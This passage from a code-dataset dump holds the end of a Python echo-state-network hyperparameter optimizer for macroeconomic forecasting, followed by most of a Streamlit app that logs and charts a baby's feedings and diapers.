[]\n for j, esn_j in enumerate(self.models_):\n esn_opt_j = ESN(\n N=esn_j.N_, A=esn_j.A_, C=esn_j.C_, activation=esn_j.activation_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j], \n )\n esn_opt.append(esn_opt_j)\n\n esnmulti_opt = ESNMultiFrequency(\n esn_opt, \n states_join=self.states_join_,\n states_lags=self.states_lags_,\n ar=self.ar_\n )\n\n elif mode_pars == 'componentRLGL':\n\n #def sparse_mask(n1, n2):\n # mask = np.array(tuple(zip(np.repeat(np.arange(n1), n1), np.tile(np.arange(n2), n2))))\n # np.random.shuffle(mask)\n # return mask\n\n spm_A = []\n spm_C = []\n for j in range(len(z) + int(self.ar_)):\n spm_Aj_ = np.arange(self.models_N_[j] ** 2)\n spm_Cj_ = np.arange(self.models_N_[j] * self.models_[j].C_.shape[1])\n np.random.shuffle(spm_Aj_)\n np.random.shuffle(spm_Cj_)\n spm_A.append(spm_Aj_)\n spm_C.append(spm_Cj_)\n\n def multiLambda(p_lambda):\n d = np.zeros(sum(self.models_N_))\n i = 0\n for n, k in enumerate(self.models_N_):\n d[i:(i+k)] = p_lambda[n] * np.ones(k)\n i += k\n return np.diagflat(d)\n\n def HYPER_obj(parsRLGL):\n p_rho = parsRLGL[0:mN]\n p_gamma = parsRLGL[(mN):(2*mN)]\n p_leak_rate = parsRLGL[(2*mN):(3*mN)]\n\n p_multilambda = 10**parsRLGL[(3*mN):(4*mN)]\n #p_lambda = 10**parsRLGL[(3*mN)]\n\n p_sparse_A = parsRLGL[(4*mN):(5*mN)]\n p_sparse_C = 
parsRLGL[(5*mN):(6*mN)]\n\n Obj = 0\n\n # Multifrequency state matrix\n X_ = np.full((len(Y_dates), self.M_), np.nan)\n\n Z = (Y, ) + z if self.ar_ else z\n p = 0\n for j, zj_ in enumerate(Z):\n Aj_ = np.ndarray.flatten(self.models_[j].A_)\n spm_Aj_ = spm_A[j][0:np.floor(self.models_N_[j] ** 2 * p_sparse_A[j]).astype(int)]\n Aj_[spm_Aj_] = 0\n Aj_ = np.reshape(Aj_, (self.models_N_[j], -1))\n\n Cj_ = np.ndarray.flatten(self.models_[j].C_)\n spm_Cj_ = spm_C[j][0:np.floor(self.models_N_[j] * self.models_[j].C_.shape[1] * p_sparse_C[j]).astype(int)]\n Cj_[spm_Cj_] = 0\n Cj_ = np.reshape(Cj_, (self.models_N_[j], -1))\n\n Xj_ = self.models_[j].generate_states(\n z=zj_, A=Aj_, C=Cj_, zeta=self.models_[j].zeta_,\n rho=p_rho[j], gamma=p_gamma[j], leak_rate=p_leak_rate[j],\n init=init[j], washout_len=washout_len\n )\n #X_[:,p:(p+self.models_N_[j])] = Xj_[X_multi_idx[j],]\n #p += self.models_N_[j]\n Xj_ = Xj_[X_multi_idx[j],]\n\n nMin = 50 #self.models_N_[j]\n for h in range(nMin, Xj_.shape[0]-1):\n # #Wj_h = Wfun(Xj_[0:h,], yj_[0:h,], p_lambda[j])\n # #Resj_h = (yj_[h,] - np.hstack((1, Xj_[h,])) @ Wj_h)\n # #Obj += np.sum(Resj_h ** 2) \n # #\n Wj_h = ls_ridge(Y=Y_[1:(1+h),], X=Xj_[0:h,], Lambda=p_multilambda[j])\n #Resj_h = (Y_[(1+h),] - np.hstack((1, Xj_[h,])) @ Wj_h)\n Resj_h = (Y_[h:(2+h),] - np.hstack((np.ones((2, 1)), Xj_[(h-1):(h+1),])) @ Wj_h)\n Obj += np.sum(Resj_h ** 2)\n\n #Wj_ = jack_ridge(Y=Y_[1:,], X=Xj_[:-1,], Lambda=p_multilambda[j])\n #Wj_h = ls_ridge(Y=Y_[1:(1+h),], X=Xj_[0:h,], Lambda=p_multilambda[j])\n #Resj_ = (Y_[1:,] - np.hstack((np.ones((Xj_.shape[0]-1, 1)), Xj_[:-1,])) @ Wj_)\n #Obj += np.sum(Resj_ ** 2)\n\n #nMin = 50\n #for h in range(nMin, X_.shape[0]-1):\n # #p_Lambda_ = multiLambda(p_multilambda)\n # p_Lambda = p_lambda\n # W_h = ls_ridge(Y=Y_[1:(1+h),], X=X_[0:h,], Lambda=p_Lambda)\n # Res_h = (Y_[(1+h),] - np.hstack((1, X_[h,])) @ W_h)\n # Obj += np.sum(Res_h ** 2) \n\n #Obj += 1 * np.sum(1 / p_gamma)\n\n return Obj\n\n #print(HYPER_obj(np.hstack((0.95 * np.ones(mN), 1 * np.ones(mN), 0.1 * np.ones(mN), -4 * np.ones(mN),\n # 0.3 * np.ones(mN), 0.3 * np.ones(mN)))))\n\n problem = FunctionalProblem(\n (6 * mN),\n HYPER_obj,\n x0 = np.hstack((0.95 * np.ones(mN), 1 * np.ones(mN), 0.1 * np.ones(mN), -4 * np.ones(mN), 0.5 * np.ones(mN), 0.5 * np.ones(mN))), \n xl = np.hstack((0.01 * np.ones(mN), 0.01 * np.ones(mN), np.zeros(mN), -5 * np.ones(mN), 0 * np.ones(mN), 0 * np.ones(mN))),\n xu = np.hstack((3.00 * np.ones(mN), 3 * np.ones(mN), 0.99 * np.ones(mN), +5 * np.ones(mN), 1 * np.ones(mN), 1 * np.ones(mN))), \n )\n\n res_h = pymoo_minimize(\n problem, \n #PSO(),\n #PatternSearch(),\n #NelderMead(),\n PatternSearch(n_sample_points=250), \n get_termination(\"time\", \"00:03:00\"),\n #get_termination(\"time\", \"00:00:05\"),\n verbose=debug, \n seed=1203477\n )\n\n if debug:\n print(\"Best solution found: \\nX = %s\\nF = %s\" % (res_h.X, res_h.F))\n\n if debug: print(\". 
Packing result\")\n\n rho_opt = (res_h.X)[0:mN]\n gamma_opt = (res_h.X)[(mN):(2*mN)]\n leak_rate_opt = (res_h.X)[(2*mN):(3*mN)]\n lambda_opt = 10**(res_h.X)[(3*mN):(4*mN)]\n\n sparse_A_opt = (res_h.X)[(4*mN):(5*mN)]\n sparse_C_opt = (res_h.X)[(5*mN):(6*mN)]\n\n X_ = np.full((len(Y_dates), self.M_), np.nan)\n\n Z = (Y, ) + z if self.ar_ else z\n p = 0\n A_ = []\n C_ = []\n for j, zj_ in enumerate(Z):\n Aj_ = np.ndarray.flatten(self.models_[j].A_)\n spm_Aj_ = spm_A[j][0:np.floor(self.models_N_[j] ** 2 * sparse_A_opt[j]).astype(int)]\n Aj_[spm_Aj_] = 0\n Aj_ = np.reshape(Aj_, (self.models_N_[j], -1))\n A_.append(Aj_)\n\n Cj_ = np.ndarray.flatten(self.models_[j].C_)\n spm_Cj_ = spm_C[j][0:np.floor(self.models_N_[j] * self.models_[j].C_.shape[1] * sparse_C_opt[j]).astype(int)]\n Cj_[spm_Cj_] = 0\n Cj_ = np.reshape(Cj_, (self.models_N_[j], -1))\n C_.append(Cj_)\n\n Xj_ = self.models_[j].generate_states(\n z=zj_, A=Aj_, C=Cj_, zeta=self.models_[j].zeta_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j],\n init=init[j], washout_len=washout_len\n )\n X_[:,p:(p+self.models_N_[j])] = Xj_[X_multi_idx[j],]\n p += self.models_N_[j]\n\n Ys = Y_[1:,]\n Xs = X_[0:(-1),]\n length_train = [Xs.shape[0], ]\n Lambda_opt = multiLambda(lambda_opt)\n #Lambda_opt = lambda_opt\n W_ = [ls_ridge(Y=Ys, X=Xs, Lambda=Lambda_opt), ]\n Y_fit = [np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_[0], ]\n Residuals = [(Ys - Y_fit[0]), ]\n\n # Output\n res = {\n 'rho_opt': rho_opt,\n 'gamma_opt': gamma_opt,\n 'leak_rate_opt': leak_rate_opt,\n 'lambda_opt': lambda_opt,\n 'W_opt': W_,\n 'Y_fit_opt': Y_fit,\n 'Residuals_opt': Residuals,\n 'Y': Y_,\n 'X': X_,\n 'length_train': length_train,\n 'x': res_h.X,\n 'fun': res_h.F,\n 'status': \"NA\",\n 'message': \"NA\",\n }\n\n # Create ESN with optimized parameters\n if optimized_ESN:\n esn_opt = []\n for j, esn_j in enumerate(self.models_):\n esn_opt_j = ESN(\n N=esn_j.N_, A=A_[j], C=C_[j], activation=esn_j.activation_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j], \n )\n esn_opt.append(esn_opt_j)\n\n esnmulti_opt = ESNMultiFrequency(\n esn_opt, \n states_join=self.states_join_,\n states_lags=self.states_lags_,\n ar=self.ar_\n )\n \n elif mode_pars == 'componentEKF':\n # Fallback parameters\n assert len(mode_opts) > 0, \"EKF linearization option required, -canonical or -joint\"\n linearization = mode_opts[0]\n\n cv_splits = 0\n test_size = None\n if 'cv' in mode_opts: \n cv_splits = int(mode_nums[mode_opts.index('cv')-1])\n assert cv_splits >= 0\n if 'test_size' in mode_opts:\n test_size = int(mode_nums[mode_opts.index('test_size')-1])\n assert test_size >= 0\n\n if debug: print(\". 
EKF optimization\")\n\n # Component-wise EKF hyperparameter optimization\n rho_opt = []\n gamma_opt = []\n leak_rate_opt = []\n\n # NOTE: this is a horrible hack!!!\n #K = [3, 24] if mN == 2 else [1 for _ in range(mN)]\n\n Z = (Y, ) + z if self.ar_ else z\n for j, zj_ in enumerate(Z):\n Ys_j = zj_.iloc[1:,].to_numpy()\n zs_j = zj_.iloc[0:(-1),].to_numpy() \n optim_j = self.models_[j].optim(\n Y=Ys_j, z=zs_j, \n mode='EKF-'+linearization,\n debug=debug,\n )\n rho_opt.append(optim_j['rho_opt'])\n gamma_opt.append(optim_j['gamma_opt'])\n leak_rate_opt.append(optim_j['leak_rate_opt'])\n\n rho_opt = np.array(rho_opt)\n gamma_opt = np.array(gamma_opt)\n leak_rate_opt = np.array(leak_rate_opt)\n \n # Generate optimized states\n def HYPER_states(p_rho, p_gamma, p_leak_rate):\n # Multifrequency state matrix\n X_ = np.full((len(Y_dates), sum(self.states_N_)), np.nan)\n\n Z = (Y, ) + z if self.ar_ else z\n p = 0 #self.models_N_[0]\n for j, zj_ in enumerate(Z):\n Xj = self.models_[j].generate_states(\n z=zj_, A=self.models_[j].A_, C=self.models_[j].C_, zeta=self.models_[j].zeta_,\n rho=p_rho[j], gamma=p_gamma[j], leak_rate=p_leak_rate[j],\n init=init[j], washout_len=washout_len\n )\n X_[:,p:(p+self.models_N_[j])] = Xj[X_multi_idx[j][0,],]\n p += self.models_N_[j]\n # Lags\n q = p + self.models_N_[j]\n for l in range(self.states_lags_[j]):\n X_[:,q:(q+self.models_N_[j])] = Xj[X_multi_idx[j][1+l,],]\n q += self.models_N_[j]\n p += q\n\n return X_\n\n X_ = HYPER_states(rho_opt, gamma_opt, leak_rate_opt)\n Ys = Y_[1:,]\n Xs = X_[0:(-1),]\n\n # Regularizer optimization\n if debug: print(\". Multi-frequency optimization\")\n\n # Generate splits\n tscv = None\n if method in ('least_squares', 'ridge'):\n if cv_splits > 2:\n tscv = TimeSeriesSplit(n_splits=cv_splits, test_size=test_size)\n\n def multiLambda(p_lambda):\n d = np.zeros(sum(self.models_N_))\n i = 0\n for n, k in enumerate(self.models_N_):\n d[i:(i+k)] = p_lambda[n] * np.ones(k)\n i += k\n return np.diagflat(d)\n\n def HYPER_obj(parsRLGL):\n p_lambda = parsRLGL[0:mN]\n\n W_ = ls_ridge(Y=Ys, X=Xs, Lambda=multiLambda(p_lambda))\n\n Obj = 0\n if method in ('least_squares', 'ridge'):\n if not tscv is None:\n for train_index, test_index in tscv.split(Xs):\n W_ = Wfun(Ys[train_index,], Xs[train_index])\n if loss == 'RSS':\n # RSS\n Res = (Ys[test_index,] - np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_)\n Obj += np.sum(Res ** 2) / len(test_index)\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_ + 5, Ys[test_index,] + 5))\n else:\n raise ValueError(\"Unknown loss function\")\n else:\n if loss == 'RSS':\n # RSS\n Res = (Ys - np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_)\n Obj += np.sum(Res ** 2)\n elif loss == 'KL':\n # KL divergence\n Obj += np.sum(kl_div(np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_ + 5, Ys + 5))\n else:\n raise ValueError(\"Unknown loss function\")\n\n return Obj\n\n problem = FunctionalProblem((mN),\n HYPER_obj,\n x0 = 1e-3 * np.ones(mN),\n xl = 1e-6 * np.ones(mN),\n xu = 1e3 * np.ones(mN),\n )\n\n res_h = pymoo_minimize(\n problem, \n PatternSearch(),\n #PatternSearch(n_sample_points=250), \n #NSGA2(),\n #PSO(),\n get_termination(\"n_eval\", 2000), \n #get_termination(\"time\", \"00:03:00\"),\n #get_termination(\"time\", \"00:00:30\"),\n verbose=True, \n seed=1203477\n )\n\n lambda_opt = res_h.X\n\n if debug: print(\". 
Packing result\")\n\n print(res_h)\n\n length_train = [Xs.shape[0], ]\n W_ = [ls_ridge(Y=Ys, X=Xs, Lambda=multiLambda(lambda_opt)), ]\n Y_fit = [np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_[0], ]\n Residuals = [(Ys - Y_fit[0]), ]\n\n # Output\n res = {\n 'lambda_opt': lambda_opt,\n 'rho_opt': rho_opt,\n 'gamma_opt': gamma_opt,\n 'leak_rate_opt': leak_rate_opt,\n 'W_opt': W_,\n 'Y_fit_opt': Y_fit,\n 'Residuals_opt': Residuals,\n 'Y': Y_,\n 'X': X_,\n 'length_train': length_train,\n 'x': res_h.X,\n 'fun': res_h.F,\n 'status': \"NA\",\n 'message': \"NA\",\n }\n\n # Create ESN with optimized parameters\n if optimized_ESN:\n esn_opt = []\n for j, esn_j in enumerate(self.models_):\n esn_opt_j = ESN(\n N=esn_j.N_, A=esn_j.A_, C=esn_j.C_, activation=esn_j.activation_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j], \n )\n esn_opt.append(esn_opt_j)\n\n esnmulti_opt = ESNMultiFrequency(\n esn_opt, \n states_join=self.states_join_,\n states_lags=self.states_lags_,\n ar=self.ar_\n )\n\n elif mode_pars == 'E_psi':\n # Fallback parameters\n cv_splits = 0\n test_size = None\n min_train_size = 1\n if 'cv' in mode_opts: \n cv_splits = int(mode_nums[mode_opts.index('cv')])\n assert cv_splits >= 0\n if method == 'rls': \n print(\"[Fit method is RLS, ignoring CV options]\")\n if 'test_size' in mode_opts:\n test_size = int(mode_nums[mode_opts.index('test_size')])\n assert test_size >= 0\n if 'min_train_size' in mode_opts:\n min_train_size = int(mode_nums[mode_opts.index('min_train_size')])\n assert min_train_size >= 0\n\n # Generate splits\n tscv = None\n if method in ('least_squares', 'ridge'):\n if cv_splits > 2:\n tscv = TimeSeriesSplit(n_splits=cv_splits, test_size=test_size)\n\n\n def HYPER_states(p_rho, p_gamma, p_leak_rate, p_zeta):\n # Multifrequency state matrix\n X_ = np.full((len(Y_dates), sum(self.states_N_)), np.nan)\n\n Z = (Y, ) + z if self.ar_ else z\n p = 0 \n for j, zj_ in enumerate(Z):\n Xj = self.models_[j].generate_states(\n z=zj_, A=self.models_[j].A_, C=self.models_[j].C_, zeta=p_zeta[j],\n rho=p_rho[j], gamma=p_gamma[j], leak_rate=p_leak_rate[j],\n init=init[j], washout_len=washout_len\n )\n X_[:,p:(p+self.models_N_[j])] = Xj[X_multi_idx[j][0,],]\n # Lags\n q = p + self.models_N_[j]\n if not self.states_lags_ is None:\n for l in range(self.states_lags_[j]):\n X_[:,q:(q+self.models_N_[j])] = Xj[X_multi_idx[j][1+l,],]\n q += self.models_N_[j]\n p += q\n\n return X_\n\n def HYPER_obj(parsRLGL):\n p_psi = parsRLGL[0:mN]\n p_leak_rate = parsRLGL[(mN):(2*mN)]\n # Effective form\n p_rho = []\n p_gamma = []\n p_zeta = []\n for j in range(len(self.models_)):\n p_rho.append((p_psi[j] * self.models_[j].rho_ / self.models_[j].gamma_))\n p_gamma.append(p_psi[j])\n p_zeta.append((p_psi[j] * self.models_[j].zeta_ / self.models_[j].gamma_))\n\n X_ = HYPER_states(p_rho, p_gamma, p_leak_rate, p_zeta)\n\n # Slice matrices\n Ys = Y_[1:,]\n Xs = X_[0:(-1),]\n\n Obj = 0\n if method in ('least_squares', 'ridge'):\n if not tscv is None:\n for train_index, test_index in tscv.split(Xs):\n W_ = Wfun(Y=Ys[train_index,], X=Xs[train_index])\n # RSS\n Res = (Ys[test_index,] - np.hstack((np.ones((len(test_index), 1)), Xs[test_index,])) @ W_)\n Obj += np.sum(Res ** 2) / len(test_index)\n else:\n #W_ = Wfun(Ys, Xs)\n # RSS\n #Res = (Ys - np.hstack((np.ones((Xs.shape[0], 1)), Xs)) @ W_)\n #Obj += np.sum(Res ** 2)\n nMin = 30\n for h in range(nMin, Xs.shape[0]):\n W_h = Wfun(Y=Ys[0:h,], X=Xs[0:h,])\n Res_h = (Ys[h,] - np.hstack((1, Xs[h,])) @ W_h)\n Obj += np.sum(Res_h ** 2) \n\n return Obj\n\n 
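# Hedged illustrative sketch (added; unused below): a minimal ridge solver\n            # consistent with how 'ls_ridge' is called throughout this file, where\n            # the returned W stacks an intercept row on top of the state coefficients\n            # so that fits are np.hstack((ones, X)) @ W. The actual 'ls_ridge' is\n            # defined elsewhere in this toolbox and may differ in detail.\n            def _ls_ridge_sketch(Y, X, Lambda):\n                V = np.hstack((np.ones((X.shape[0], 1)), X))  # design with intercept\n                if np.isscalar(Lambda):\n                    P = Lambda * np.eye(V.shape[1])\n                else:\n                    P = block_diag(np.zeros((1, 1)), Lambda)  # diagonal penalty on states\n                P[0, 0] = 0.0  # assumption: the intercept is left unpenalized\n                return np.linalg.solve(V.T @ V + P, V.T @ Y)\n\n            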
HYPER_obj(np.hstack((np.ones(mN), np.zeros(mN))))\n\n problem = FunctionalProblem((2 * mN),\n HYPER_obj,\n x0 = np.hstack((np.ones(mN), np.zeros(mN))), \n xl = np.hstack((1e-2 * np.ones(mN), np.zeros(mN))),\n xu = np.hstack((3 * np.ones(mN), np.ones(mN))), \n )\n\n res_h = pymoo_minimize(\n problem, \n PatternSearch(), \n #PatternSearch(n_sample_points=250),\n #NSGA2(),\n #PSO(),\n get_termination(\"n_eval\", 150), \n #get_termination(\"time\", \"00:03:00\"),\n verbose=debug, \n seed=1203477\n )\n\n if debug: print(\". Packing result\")\n\n # Evaluate optimization fit\n psi_opt = (res_h.X)[0:mN]\n leak_rate_opt = (res_h.X)[(mN):(2*mN)]\n\n rho_opt = np.zeros(mN)\n gamma_opt = np.zeros(mN)\n zeta_opt = []\n for j in range(len(self.models_)):\n rho_opt[j] = (psi_opt[j] * self.models_[j].rho_ / self.models_[j].gamma_)\n gamma_opt[j] = (psi_opt[j])\n zeta_opt.append((psi_opt[j] * self.models_[j].zeta_ / self.models_[j].gamma_))\n\n length_train = []\n W_ = []\n Y_fit = []\n Residuals = []\n\n if debug: \n print(\"Best solution found:\")\n print(f\"psi = {psi_opt}\")\n print(f\"leak_rate = {leak_rate_opt}\")\n print(f\"Final objective funtion value:\")\n print(f\"F = {HYPER_obj(res_h.X)}\")\n\n X_ = HYPER_states(rho_opt, gamma_opt, leak_rate_opt, zeta_opt)\n\n # Slice matrices\n Y_o = Y_[1:,]\n X_o = X_[0:(-1),]\n if method in ('least_squares', 'ridge') and not tscv is None:\n for train_index, test_index in tscv.split(X_o):\n W_split = Wfun(Y_o[train_index,], X_o[train_index,])\n Y_fit_split = np.hstack((np.ones((len(test_index), 1)), X_o[test_index,])) @ W_split\n Residuals_split = (Y_o[test_index,] - Y_fit_split)\n length_train.append(len(train_index))\n W_.append(W_split)\n Y_fit.append(Y_fit_split)\n Residuals.append(Residuals_split)\n else:\n length_train = [0, ] #[X_o.shape[0], ]\n W_ = [Wfun(Y_o, X_o), ]\n Y_fit = [np.hstack((np.ones((X_o.shape[0], 1)), X_o)) @ W_[0], ]\n Residuals = [(Y_o - Y_fit[0]), ]\n\n # Output\n res = {\n 'psi_opt': psi_opt,\n 'rho_opt': rho_opt,\n 'gamma_opt': gamma_opt,\n 'leak_rate_opt': leak_rate_opt,\n 'zeta_opt': zeta_opt,\n 'W_opt': W_,\n 'Y_fit_opt': Y_fit,\n 'Residuals_opt': Residuals,\n 'Y': Y_,\n 'X': X_,\n 'length_train': length_train,\n 'x': res_h.X,\n 'fun': res_h.F,\n 'status': \"NA\",\n 'message': \"NA\",\n }\n\n # Create ESN with optimized parameters\n if optimized_ESN:\n esn_opt = []\n for j, esn_j in enumerate(self.models_):\n esn_opt_j = ESN(\n N=esn_j.N_, A=esn_j.A_, C=esn_j.C_, zeta=zeta_opt[j], activation=esn_j.activation_,\n rho=rho_opt[j], gamma=gamma_opt[j], leak_rate=leak_rate_opt[j], \n )\n esn_opt.append(esn_opt_j)\n\n esnmulti_opt = ESNMultiFrequency(\n esn_opt, \n states_join=self.states_join_,\n states_lags=self.states_lags_,\n ar=self.ar_\n )\n\n else:\n raise ValueError(\"Optimization method descriptor not defined\")\n\n res['mode'] = mode\n res['mode_pars'] = mode_pars\n res['mode_opts'] = mode_opts\n res['mode_nums'] = mode_nums\n\n if optimized_ESN:\n return res, esnmulti_opt\n else:\n return res\n","repo_name":"RCEconModelling/Reservoir-Computing-for-Macroeconomic-Modelling","sub_path":"python/newToolbox_ESN_Multi.py","file_name":"newToolbox_ESN_Multi.py","file_ext":"py","file_size_in_byte":131967,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"12485267926","text":"import streamlit as st\nimport os\nimport numpy as np\nimport pandas as pd\nimport altair as alt\nimport datetime\n\n\n\n\ndef get_inputs():\n st.header(\"Inputs\")\n data={}\n 
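# NOTE (added comment): the fixed 4-hour shift below is a rough UTC ->\n    # US Eastern conversion; it ignores daylight-saving transitions, so the\n    # default date/time can be off by one hour for part of the year.\n    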
today=datetime.datetime.utcnow()-datetime.timedelta(hours=4)\n today_date=today.date()\n today_time=today.time()\n d = st.date_input(\"Date\",today_date)\n data['Date']=d\n\t#st.write('Date:', d)\n t=st.time_input('Time', today_time)\n\t#st.write('Time', t)\n data['Time']=t\n\n Foptions=['','Breast (Fed)', 'Breast (Pumped)', 'Formula (Similac)', 'Formula (Neopro)', 'Formula (Neopro Gentlease)']\n Food = st.selectbox('Food',Foptions)\n data['Food']=Food\n Quantity=st.number_input('Quantity (ml)', value=0, step=5)\n data['Quantity (ml)']=Quantity\n\n st.write(\"Diaper Inputs\")\n pee = st.checkbox('pee')\n poo = st.checkbox('poo')\n if pee ==1:\n data['Pee']='Pee'\n else:\n data['Pee']=''\n if poo ==1:\n data['Poop']='Poop'\n else:\n data['Poop']=''\n notes= st.text_input(\"Notes\", value = '')\n data['Notes'] =notes\n# cs=df1.columns.to_list()\n# st.write(cs)\n data_df=pd.DataFrame([data])\n data_df=data_df.replace('Empty', ' ')\n# st.write(data_df)\n data_df=data_df[['Date', 'Time', 'Pee', 'Poop', 'Food', 'Quantity (ml)', 'Notes']]\n# save=st.selectbox(\"End\",['save or test?','save','test'])\n# if save=='save':\n# data_df.to_csv(\"temp.csv\")\n# st.write(\"Saved\")\n# st.write(df1.iloc[-1])\n# elif save=='test':\n# data_df.to_csv(\"temp.csv\")\n# st.write(\"Written to temp\")\n# save= st.selectbox('Delete will not include above input, Temp gives one shot, Save adds input to file',['Delete','Save','Temp'])\n save=st.button(\"Save\")\n if save ==True:\n data_df.to_csv(\"temp.csv\")\n st.write(\"Saved\")\n# df2=get_fulldata()\n# df2.to_csv(\"Marie_Tracker_Responses1.csv\")\n# elif save=='Delete':\n# os.remove(\"temp.csv\")\n# elif save=='Temp':\n# pass\n return \n\ndef get_data0():\n df1=pd.read_csv(\"Marie_Tracker_Responses1.csv\")\n df1=df1[['Date','Time', 'Pee', 'Poop', 'Food', 'Quantity (ml)', 'Notes']]\n #df1['Date']=pd.to_datetime(df1['Date'], format='%d/%m/%Y')\n df1['Date']=pd.to_datetime(df1['Date'])\n df1['Date']=df1['Date'].dt.date\n df1=df1.replace(np.nan, '', regex=True)\n df1.loc[df1['Notes'].str.contains('Gentlease'),'Food']='Formula (Neopro Gentlease)'\n return df1\n\ndef get_fulldata():\n df1=get_data0()\n if os.path.isfile(\"temp.csv\"):\n temp=pd.read_csv(\"temp.csv\",index_col=0)\n temp['Date']=pd.to_datetime(temp['Date'])\n temp['Date']=temp['Date'].dt.date\n df1=df1.append(temp,ignore_index=True)\n df1.to_csv(\"Marie_Tracker_Responses1.csv\")\n os.remove(\"temp.csv\")\n return df1\n\nst.title (\"Marie Tracker\")\n\ndef main():\n df1=get_fulldata()\n df1r=df1[::-1]\n df1f=df1r[df1r['Food']!='']\n df1f=df1f.iloc[0]\n st.header(\"Home\")\n st.write(\"Last feeding\", df1f['Date'], df1f['Time'], df1f['Food'], df1f['Quantity (ml)'],\"ml\")\n\n st.subheader(\"Last 3 days\")\n date_uni=df1r['Date'].unique()\n days3=date_uni[1:4] \n\n df1_1=df1[df1['Date']==days3[0]]\n df1_2=df1[df1['Date']==days3[1]]\n df1_3=df1[df1['Date']==days3[2]]\n df_list=[df1_1,df1_2,df1_3]\n\n\n# st.write(\"test\", df1_1[(df1_1['Pee']=='Pee')| (df1_1['Poop']=='Poop')].count()[0])\n\n# var=['Total Diapers', 'Number Pee', 'Number Poop']\n days_d=[]\n for day in range(3):\n df_day=df_list[day]\n day_d={}\n day_d['Date']=days3[day]\n day_d['Total Diapers']= df_day[(df_day['Pee']=='Pee')| (df_day['Poop']=='Poop')].count()[0]\n day_d['N.o Poop']= df_day[(df_day['Poop']=='Poop')].count()[0]\n day_d['N.o Pee']= df_day[(df_day['Pee']=='Pee')].count()[0]\n days_d.append(day_d)\n days_df=pd.DataFrame(days_d)\n st.write(days_df)\n st.write(\"Feeding on \", days3[0])\n st.write(df1_1[['Date','Food', 'Quantity (ml)' 
]].groupby('Food').sum())\n st.write(\"Feeding on \", days3[1])\n st.write(df1_2[['Date','Food', 'Quantity (ml)' ]].groupby('Food').sum())\n st.write(\"Feeding on \", days3[2])\n st.write(df1_3[['Date','Food', 'Quantity (ml)' ]].groupby('Food').sum())\n\n #st.write(df_i[['Date','Food', 'Quantity (ml)' ]].groupby('Food').sum())\n\n \n select_date = st.selectbox('Date',(days3[0], days3[1], days3[2]))\n if select_date==days3[0]:\n st.write(df1_1)\n elif select_date==days3[1]:\n st.write(df1_2)\n elif select_date==days3[2]:\n st.write(df1_3)\n\n\n\n# df1_yfood=df1_y[df1_y['Food']!='']\n# df1_yfood['Quantity (ml)']=df1_yfood['Quantity (ml)'].astype(int)\n# st.write(df1_y)\n# st.write(\"Number of Times Pee:\",df1_y[df1_y['Pee']!='']['Pee'].count())\n# st.write(\"Number of Times Poop:\",df1_y[df1_y['Poop']!='']['Poop'].count())\n# st.write(\"Total Feeding (ml):\",df1_yfood['Quantity (ml)'].sum())\n# st.write(df1_yfood[['Food', 'Quantity (ml)' ]].groupby('Food').sum())\n# st.write(\"Full Data\")\n# st.write(df1r)\n\n return\n\ndef full_data():\n df1=get_fulldata()\n df1r=df1[::-1]\n st.header(\"Full Data\")\n st.write(df1r)\n return\n\ndef food_chart(df1, var):\n df1_food=df1[df1['Food']!='']\n if var == 'Time':\n df1_food['Time']=pd.to_datetime(df1_food['Time']).dt.hour\n df1_food['Quantity (ml)']=df1_food['Quantity (ml)'].astype(int)\n df1_foodg=df1_food[[var,'Food', 'Quantity (ml)']].groupby([var,'Food']).sum()\n df1_foodg2=df1_foodg.to_records()\n df1_foodg2=pd.DataFrame.from_records(df1_foodg2)\n df1_foodg2_total=df1_foodg2.groupby(var).sum().reset_index()\n df1_foodg2_total = df1_foodg2_total.rename(columns = {'index':var})\n df1_foodg2_total['Food']='Total'\n df1_foodg2=df1_foodg2.append(df1_foodg2_total,ignore_index=True)\n C1=alt.Chart(df1_foodg2).mark_line(point=True).encode(\n x=var,\n y=alt.Y('Quantity (ml)', impute=alt.ImputeParams(value=0), scale=alt.Scale(domain=[0,750])),\n color='Food',\n tooltip = ['Food', 'Quantity (ml)', var]\n).properties(width=800,height=400,title='Food Quantity').interactive()\n \n return C1\n\ndef diaper_chart(df1,var):\n df1_poo=df1[df1['Poop']=='Poop']\n df1_pee=df1[df1['Pee']=='Pee']\n df1_peepoo=df1[(df1['Pee']=='Pee')| (df1['Poop']=='Poop')]\n if var == 'Time':\n df1_poo['Time']=pd.to_datetime(df1_poo['Time']).dt.hour\n df1_pee['Time']=pd.to_datetime(df1_pee['Time']).dt.hour\n df1_peepoo['Time']=pd.to_datetime(df1_peepoo['Time']).dt.hour\n df1_peepoo=df1_peepoo.groupby(var).count().reset_index()\n df1_peepoo['Total']=df1_peepoo['Pee']\n df1_peepoo=df1_peepoo[[var,'Total']]\n df1_poog1=df1_poo[[var,'Poop']].groupby(var).count().reset_index()\n df1_peeg1=df1_pee[[var, 'Pee']].groupby(var).count().reset_index()\n df1_diaper=df1_poog1.merge(df1_peeg1)\n\n df1_diaper=df1_diaper.merge(df1_peepoo)\n df1_diaper=df1_diaper.melt(var, var_name='Diaper', value_name='count')\n C2=alt.Chart(df1_diaper).mark_line(point=True).encode(\n x=var,\n y=alt.Y('count', impute=alt.ImputeParams(value=0), scale=alt.Scale(domain=[0,12])) ,\n color='Diaper',\n tooltip = ['Diaper', 'count',var]\n).properties(width=800,height=400,title='Diaper Count').interactive()\n \n return C2\n\n\n\ndef charts():\n df1=get_fulldata()\n st.header(\"Charts By Day\")\n C1=food_chart(df1, 'Date')\n C2=diaper_chart(df1, 'Date')\n st.write(C1)\n st.write(C2)\n st.header(\"Charts By Time\")\n C3=food_chart(df1, 'Time')\n C4=diaper_chart(df1, 'Time')\n st.write(C3)\n st.write(C4)\n\npage='Home'\npage=st.sidebar.selectbox(\"Which Page Would you like to go to?\", ('Home','Input', 'Full Data', 
